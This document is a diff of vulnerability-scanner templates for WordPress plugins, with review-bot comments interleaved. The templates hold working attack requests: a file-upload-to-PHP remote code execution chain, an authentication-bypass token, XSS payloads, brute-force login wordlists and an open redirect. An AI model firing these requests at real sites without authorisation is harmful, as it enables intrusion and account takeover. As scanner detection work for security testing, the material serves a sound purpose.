7d0e87a274..30764c6e96 100644 --- a/poc/wordpress/viewpoint-system-status-11016.yaml +++ b/poc/wordpress/viewpoint-system-status-11016.yaml @@ -1,24 +1,20 @@ id: viewpoint-system-status - info: name: ViewPoint System Status author: dhiyaneshDK severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" + reference: + - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 tags: status,exposures,viewpoint - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'ViewPoint System Status' - - type: status status: - 200 
diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml index c6cdd244de..4419af6656 100644 --- a/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml +++ b/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml @@ -1,7 +1,7 @@ id: wordpress-accessible-wpconfig info: name: WordPress accessible wp-config - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + author: Kiblyn11 & zomsop82 & madrobot & geeknik & daffainfo severity: high tags: wordpress,backups requests: diff --git a/poc/wordpress/wordpress-db-repair-11254.yaml b/poc/wordpress/wordpress-db-repair-11254.yaml index 3b9b5fb05f..7c9d635e19 100644 --- a/poc/wordpress/wordpress-db-repair-11254.yaml +++ b/poc/wordpress/wordpress-db-repair-11254.yaml @@ -1,20 +1,24 @@ id: wordpress-db-repair + info: name: Wordpress DB Repair Exposed author: _C0wb0y_ severity: low description: Discover enabled Wordpress repair page. tags: wordpress,config,fpd + requests: - method: GET path: - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and matchers: - type: word words: - "WordPress" + - type: word words: - "define('WP_ALLOW_REPAIR', true);" - negative: true + negative: true \ No newline at end of file diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11258.yaml index dee5e0d057..25e5e05c1e 100644 --- a/poc/wordpress/wordpress-debug-log-11258.yaml +++ b/poc/wordpress/wordpress-debug-log-11258.yaml @@ -1,9 +1,11 @@ id: wp-debug-log + info: name: WordPress debug log author: geraldino2 & @dwisiswant0 severity: low tags: wordpress,log + requests: - method: GET path: @@ -22,4 +24,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml b/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml index b4c420c7dc..e4393fb210 100644 
--- a/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml +++ b/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml 
@@ -1,29 +1,46 @@ id: wp-woocommerce-email-verification + info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie,daffianfo severity: critical - tags: wordpress,wp-plugin - - # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - # https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + description: | + Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. + reference: + - https://wpvulndb.com/vulnerabilities/10318 + - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 2 + tags: woocommerce,wp,wpscan,wordpress,wp-plugin -requests: +http: - method: GET path: + - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + + stop-at-first-match: true matchers-condition: and matchers: + - type: regex + part: header + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: word + part: body words: - - "wordpress_logged_in" - part: header + - "Your account has been activated!" + - "From your account dashboard you can view your" + condition: and - type: status status: - - 401 - - 403 - negative: true \ No newline at end of file + - 200 + +# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/wordpress/wordpress-git-config-11278.yaml b/poc/wordpress/wordpress-git-config-11278.yaml index 2e71493a93..623ab5f4aa 100644 --- a/poc/wordpress/wordpress-git-config-11278.yaml +++ b/poc/wordpress/wordpress-git-config-11278.yaml @@ -5,13 +5,10 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-plugins-detect.yaml b/poc/wordpress/wordpress-plugins-detect.yaml index e6fcb6dba4..fb3b30feac 100644 --- a/poc/wordpress/wordpress-plugins-detect.yaml +++ b/poc/wordpress/wordpress-plugins-detect.yaml 
@@ -1,47 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection - author: 0xcrypto, foulenzer - severity: high + author: 0xcrypto + severity: info tags: fuzz,wordpress - requests: - raw: - | - GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} threads: 50 payloads: - plugin: - - contact-form-7 - - wordpress-seo - - elementor - - woocommerce - - all-in-one-wp-migration - - updraftplus - - all-in-one-seo-pack - - duplicator - - essential-addons-for-elementor-lite - - optinmonster - - w3-total-cache - - redux-framework - - ninja-forms - + pluginSlug: helpers/wordlists/wordpress-plugins.txt matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml index 804afc6b74..d50fb50d35 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml @@ -1,4 +1,5 @@ id: wordpress-rce-simplefilelist + info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha 
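Review bot: The payload list in wordpress-plugins-detect.yaml now comes from `helpers/wordlists/wordpress-plugins.txt`, a file this hunk does not add, so the template will fail to load wherever that relative path does not resolve. It is worth confirming that the file exists under the directory the scanner treats as its template root, since these templates sit under `poc/wordpress/`. With `threads: 50` and a wordlist of unknown size the request volume per target is also unbounded; a comment such as `# one request per wordlist entry; lower threads on shared hosting` next to `threads:` would make that visible.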
@@ -6,15 +7,14 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -39,22 +39,21 @@ requests: <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/wordpress-registration-enabled.yaml b/poc/wordpress/wordpress-registration-enabled.yaml index 237cd57ccb..4ff7356f84 100644 --- a/poc/wordpress/wordpress-registration-enabled.yaml +++ b/poc/wordpress/wordpress-registration-enabled.yaml 
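Review bot: The uploaded file kept in the `@@ -39,22 +39,21 @@` hunk still calls `phpinfo()` and is renamed to `nuclei.php` with no request that removes it, so every positive scan leaves a publicly reachable information-disclosure page on the target. The new `intrusive` tag signals the risk, but the description does not tell the operator to clean up. I would shorten the body to the marker alone, `<?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; ?>`, and add a sentence to `description` saying that `/wp-content/uploads/simple-file-list/nuclei.php` has to be deleted after a match. The matchers sit below the hunk and may check for `phpinfo()` output, in which case they need the same adjustment.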
@@ -1,9 +1,9 @@ id: wordpress-account-registration-enabled info: - name: WordPress Account Registration Enabled - author: h0tak88r - severity: low + name: WordPress account registration enabled + author: topscoder + severity: info tags: wordpress-misc,wordpress,wp-core,core,info http: @@ -18,7 +18,7 @@ http: - 200 - type: word words: - - "username" - - "email" - condition: or + - "Register" part: body + +# Enhanced \ No newline at end of file diff --git a/poc/wordpress/wordpress-rest-dosviacp.yaml b/poc/wordpress/wordpress-rest-dosviacp.yaml index ae2b84c698..2bd0dbbdff 100644 --- a/poc/wordpress/wordpress-rest-dosviacp.yaml +++ b/poc/wordpress/wordpress-rest-dosviacp.yaml @@ -4,8 +4,11 @@ info: name: WordPress Core 4.7.0-6.3.1 - Denial of Service via Cache Poisoning author: Jupiter severity: medium - description: WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in a denial of service. - reference: https://www.wordfence.com/blog/2023/10/wordpress-6-3-2-security-release-what-you-need-to-know/ + description: | + WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in a denial of service. + reference: + - https://www.wordfence.com/blog/2023/10/wordpress-6-3-2-security-release-what-you-need-to-know/ + tags: wordpress,wp,cache-poisoning variables: string: "{{to_lower(rand_base(5))}}" @@ -52,4 +55,4 @@ http: - type: regex part: header regex: - - '\bHIT\b' \ No newline at end of file + - '\bHIT\b' 
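Review bot: The body matcher in the `@@ -18,7 +18,7 @@` hunk of wordpress-registration-enabled.yaml is now the single word `Register`, which appears on many login, shop and theme pages that do not offer open registration and is absent on non-English sites. Matching on the form markup is tighter, for example `- 'name="registerform"'` in place of `- "Register"`. The request path lies between the two hunks and is not visible here, so this assumes the template requests the registration view of `wp-login.php`. The trailing `# Enhanced` comment has no final newline and carries no information, so it can be dropped.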
diff --git a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml index d33b95d124..8e6ffbf93e 100644 --- a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml +++ b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml @@ -3,7 +3,7 @@ info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info - tags: wordpress,wp-plugin,backup + tags: wordpress,wp-plugin,backups requests: - method: GET path: diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..3309a80e9e 100644 --- a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -1,27 +1,32 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high - reference: - - https://www.exploit-db.com/exploits/49252 + reference: https://www.exploit-db.com/exploits/49252 tags: wordpress,wp-plugin + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: + - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-user-enum.yaml b/poc/wordpress/wordpress-user-enum.yaml index e938ce3114..b113be4fbf 100644 --- a/poc/wordpress/wordpress-user-enum.yaml +++ b/poc/wordpress/wordpress-user-enum.yaml @@ -1,16 +1,13 @@ id: wordpress-user-enum - info: name: Wordpress User Enumeration author: r3dg33k severity: info tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/?author=1" - matchers-condition: and matchers: - type: regex @@ -20,7 +17,6 @@ requests: - type: status status: - 301 - extractors: - type: regex part: header 
diff --git a/poc/wordpress/wordpress-user-enumeration.yaml b/poc/wordpress/wordpress-user-enumeration.yaml index 663fd58ce8..c06644e07a 100644 --- a/poc/wordpress/wordpress-user-enumeration.yaml +++ b/poc/wordpress/wordpress-user-enumeration.yaml @@ -1,9 +1,11 @@ id: wordpress-user-enumeration + info: name: Wordpress user enumeration author: Manas_Harsh & daffainfo severity: info tags: wordpress + requests: - method: GET path: diff --git a/poc/wordpress/wordpress-weak-credentials.yaml b/poc/wordpress/wordpress-weak-credentials.yaml index 7c0be01ac7..a4747ae6ab 100644 --- a/poc/wordpress/wordpress-weak-credentials.yaml +++ b/poc/wordpress/wordpress-weak-credentials.yaml @@ -1,5 +1,4 @@ id: wordpress-weak-credentials - info: name: WordPress - Weak Credentials author: evolutionsec @@ -11,10 +10,8 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 tags: wordpress,default-login,fuzz - requests: - raw: - | @@ -25,24 +22,20 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} - payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb - stop-at-first-match: true matchers-condition: and matchers: - - type: word part: header words: - '/wp-admin' - 'wordpress_logged_in' condition: and - - type: status status: - 302 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml 
@@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/wordpress/wordpress-wordfence-xss-11362.yaml b/poc/wordpress/wordpress-wordfence-xss-11362.yaml index 5e9faea1da..5bae09492e 100644 --- a/poc/wordpress/wordpress-wordfence-xss-11362.yaml +++ b/poc/wordpress/wordpress-wordfence-xss-11362.yaml @@ -1,37 +1,23 @@ id: wordpress-wordfence-xss - info: - name: WordPress Wordfence 7.4.6 - Cross0Site Scripting + name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 tags: wordpress,wp-plugin,xss,wordfence - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" - matchers-condition: and matchers: - type: word words: - "'>\"<svg/onload=confirm('test')>" part: body - - type: word words: - "text/html" part: header - - type: status status: - 200 - -# digest: 4b0a00483046022100815f67bcdfe2984d98c0813beb5910e2cc89f870bb3bbd77541709c3b946b81d022100a2dbf03c4062d763655eb094266a2faa921751d5b6a85ddc160e4731ee1731a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml index a36ec88196..bd81293cdb 100644 --- a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml +++ b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml 
@@ -1,27 +1,22 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss requests: - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml b/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml index dc8fd403a8..877c27c3f1 100644 --- a/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml +++ b/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml 
@@ -1,24 +1,28 @@ -id: wp-123contactform-plugin-listing -info: - name: WordPress 123ContactForm Plugin Directory Listing - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: | - - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/123contactform-for-wordpress" - condition: and - - type: status - status: - - 200 +id: wp-123contactform-plugin-listing + +info: + name: WordPress 123ContactForm Plugin Directory Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: | + - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html + - https://www.exploit-db.com/ghdb/6979 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/123contactform-for-wordpress" + condition: and + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-adaptive-xss.yaml b/poc/wordpress/wp-adaptive-xss.yaml index f297df178f..0a6168d053 100644 --- a/poc/wordpress/wp-adaptive-xss.yaml +++ b/poc/wordpress/wp-adaptive-xss.yaml @@ -1,4 +1,5 @@ id: wp-adaptive-xss + info: name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting author: dhiyaneshDK 
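Review bot: `reference: |` on the new side of wp-123contactform-plugin-listing-11400.yaml turns the two `- https://…` entries into one literal block string instead of a YAML list, so consumers most likely receive a single value that starts with `- ` and contains a newline. The line-ending cleanup in this hunk carries that defect over unchanged, and wp-socialfit-xss-11582.yaml introduces it anew by changing `reference:` to `reference: |`. Both should read `reference:` followed by the indented `- https://…` items.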
@@ -8,10 +9,12 @@ info: - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - https://plugins.trac.wordpress.org/changeset/2655683 tags: wordpress,xss,wp-plugin,wp + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" + matchers-condition: and matchers: - type: word @@ -19,10 +22,12 @@ requests: - '<img/src/onerror=alert(document.domain)>' - '<td>Image</td>' condition: and + - type: word part: header words: - 'text/html' + - type: status status: - 200 diff --git a/poc/wordpress/wp-arforms-listing.yaml b/poc/wordpress/wp-arforms-listing.yaml index e223f9ef7d..505669bffc 100644 --- a/poc/wordpress/wp-arforms-listing.yaml +++ b/poc/wordpress/wp-arforms-listing.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6424 + reference: https://www.exploit-db.com/ghdb/6424 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-church-admin-xss-11424.yaml b/poc/wordpress/wp-church-admin-xss-11424.yaml index 089b607075..6dfb09ebcb 100644 --- a/poc/wordpress/wp-church-admin-xss-11424.yaml +++ b/poc/wordpress/wp-church-admin-xss-11424.yaml 
@@ -1,29 +1,25 @@ id: wp-church-admin-xss - info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-code-snippets-xss.yaml b/poc/wordpress/wp-code-snippets-xss.yaml index d6d4c61340..b3552bcadb 100644 --- a/poc/wordpress/wp-code-snippets-xss.yaml +++ b/poc/wordpress/wp-code-snippets-xss.yaml @@ -1,11 +1,10 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - XSS author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - reference: - - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -27,9 +26,6 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' - - 'toplevel_page_snippets' - - 'Search results in tag' - condition: and - type: word part: header words: 
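Review bot: In wp-code-snippets-xss.yaml the `@@ -27,9 +26,6 @@` hunk removes `'toplevel_page_snippets'`, `'Search results in tag'` and `condition: and` from the body matcher, leaving only the reflected `</script><script>alert(document.domain)</script>` string. Any HTML page that echoes the parameter would then be reported as this plugin's issue, which raises the false-positive rate for a template tagged `authenticated`. I would keep the two context words and `condition: and` so the finding stays tied to the Code Snippets search page. The matcher list continues past the end of the hunk.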
diff --git a/poc/wordpress/wp-flagem-xss.yaml b/poc/wordpress/wp-flagem-xss.yaml index 98183da5f2..bc74462f47 100644 --- a/poc/wordpress/wp-flagem-xss.yaml +++ b/poc/wordpress/wp-flagem-xss.yaml @@ -1,30 +1,24 @@ id: wp-flagem-xss - info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.exploit-db.com/exploits/38674 + reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-grimag-open-redirect-11458.yaml b/poc/wordpress/wp-grimag-open-redirect-11458.yaml index 40803f329c..20ac245e37 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11458.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11458.yaml 
@@ -1,18 +1,30 @@ id: wp-grimag-open-redirect + info: - name: WordPress Grimag Themes < 1.1.1 Open Redirection + name: WordPress Grimag <1.1.1 - Open Redirection author: 0x_Akoko - severity: low - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + severity: medium + description: WordPress Grimag theme before 1.1.1 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in 1.1.1. reference: - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a - tags: wordpress,wp-theme,redirect -requests: + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 + tags: wp-theme,redirect,wpscan,wordpress + +http: - method: GET path: - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4a0a00473045022100d40ec63c134265020e2c32431122360fc45c7638ad3697c5ce3f42982b1cd01b02207e07120720fc907481b2c0530ce58a1079e47bc99d77fb5c35a578ccc5bce04b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-gtranslate-open-redirect.yaml b/poc/wordpress/wp-gtranslate-open-redirect.yaml index 3db87c4aa6..2d9331f914 100644 --- a/poc/wordpress/wp-gtranslate-open-redirect.yaml +++ b/poc/wordpress/wp-gtranslate-open-redirect.yaml 
@@ -4,8 +4,9 @@ info: author: dhiyaneshDK severity: medium description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability. + reference: + - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ tags: redirect,wordpress - reference: https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ requests: - method: GET path: diff --git a/poc/wordpress/wp-haberadam-idor-11468.yaml b/poc/wordpress/wp-haberadam-idor-11468.yaml index c8001614ba..c933e6ab2a 100644 --- a/poc/wordpress/wp-haberadam-idor-11468.yaml +++ b/poc/wordpress/wp-haberadam-idor-11468.yaml @@ -1,21 +1,17 @@ id: wp-haberadam-idor - info: - name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure + name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API author: pussycat0x severity: low - reference: - - https://cxsecurity.com/issue/WLB-2021090078 + reference: https://cxsecurity.com/issue/WLB-2021090078 metadata: google-dork: inurl:/wp-content/themes/haberadam/ tags: wordpress,idor,wp-theme,disclosure - requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id=' - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id=' - stop-at-first-match: true matchers-condition: and matchers: @@ -27,11 +23,9 @@ requests: - '"degree"' - '"icon"' condition: and - - type: status status: - 200 - - type: word part: header words: diff --git a/poc/wordpress/wp-idx-broker-platinum-listing.yaml b/poc/wordpress/wp-idx-broker-platinum-listing.yaml index bee377c8d3..6e2ffaab6c 100644 --- a/poc/wordpress/wp-idx-broker-platinum-listing.yaml +++ b/poc/wordpress/wp-idx-broker-platinum-listing.yaml 
